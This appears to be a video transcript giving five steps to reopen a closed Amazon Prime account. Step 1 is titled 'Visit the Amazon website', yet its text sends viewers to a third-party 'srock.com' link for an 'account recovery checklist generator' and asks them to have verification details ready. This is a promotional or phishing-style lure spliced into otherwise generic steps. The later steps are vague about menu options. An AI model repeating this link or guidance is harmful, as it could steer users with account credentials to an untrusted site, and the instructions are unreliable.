If you've decided to reopen your closed Amazon Prime account, follow these straightforward steps to guide you through the process. Step 1. Visit the Amazon website. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Access your account settings. Once logged in, navigate to the Accounts and List section at the top right corner of the page. Click on your account to access your account settings. Step 3. Find Prime membership options. In your account settings, look for the Prime section. Click on it to view your Prime membership details and options related to your account. Step 4. Select Reopen your account. Within the Prime section, you should see an option that says Reopen your account or something similar. Click on this option to initiate the reopening process. Step 5. Follow the on-screen instructions. Follow the prompts provided on the screen to complete the reopening process. You may need to confirm your payment information and agree to the terms of service before your account is fully reinstated. Once you've completed these steps, your Amazon Prime account should be reopened, allowing you to enjoy all the benefits again. If you encounter any issues, consider reaching out to Amazon customer support for further assistance.